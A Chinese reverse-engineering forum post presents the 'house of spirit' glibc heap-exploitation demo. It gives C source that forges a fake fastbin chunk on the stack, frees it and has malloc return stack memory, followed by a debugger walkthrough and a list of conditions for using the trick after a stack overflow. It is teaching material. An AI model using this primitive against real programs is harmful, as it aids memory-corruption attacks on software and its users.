学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

2万

积分

41

好友

1171

主题
发表于 2020-9-2 09:52:52 | 查看: 2513| 回复: 0

相关题目:

源码
#include 
  #include 
  int main()
  {
  fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
  fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
  malloc(1);
  fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
  unsigned long long *a;
  // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
  unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
  fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);
  fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
  fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
  fake_chunks[1] = 0x40; // this is the size
  fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
  // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
  fake_chunks[9] = 0x1234; // nextsize
  fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
  fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
  a = &fake_chunks[2];
  fprintf(stderr, "Freeing the overwritten pointer.\n");
  free(a);
  fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
  fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
  }
  

运行结果

house_of_spirit

house_of_spirit
分析&调试
就是在栈上伪造了chunk,然后free掉,之后再malloc就会malloc到栈上
调试:
该开始先malloc(1):

house_of_spirit

house_of_spirit
之后声明一个指针变量a和fake_chunks[10]数组(对齐的):
这时a的值为0,地址为0x7fffffffdc18
fake_chunks的地址为0x7fffffffdc20,紧接着a

house_of_spirit

house_of_spirit
接下来我们要伪造chunk了
首先fack_chunks[1]=40,这就是伪造的第一个chunk的伪造的size字段,伪造了大小为40

house_of_spirit

house_of_spirit
然后fake_chunks[9] = 0x1234,这就是伪造的第二个chunk的伪造的size字段的值
到此为止,两个chunk大小伪造好了

house_of_spirit

house_of_spirit
接下来将a赋值为我们伪造的第一个chunk的mem指针的值,也就是0x7fffffffdc30,这样a就指向了我们伪造的第一个chunk

house_of_spirit

house_of_spirit
这之后我们free(a)
就会发现我们伪造的chunk成功到了fastbin中

house_of_spirit

house_of_spirit
这样的话我们接下来再进行malloc相同大小就会malloc到栈上了,我们伪造的chunk成功被malloc出去

house_of_spirit

house_of_spirit
总结
  • 发生栈溢出时,若是能覆盖某个即将free的指针,我们可以将这个指针改成栈上的地址,并且在栈上这个地址上伪造一个chunk,free后再malloc相同大小就malloc到伪造的chunk了
  • size字段的三个标志位前两个必须是0(否则就到不了fast bin里了)
  • size本身需要符合fast bin的大小
  • next chunk大小也必须>2*SIZE_SZ&&<system_mem,否则会报invalid next size的错误。(64位下就是16B<<128kb)


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

GMT+8, 2024-12-22 18:58 , Processed in 0.169826 second(s), 38 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表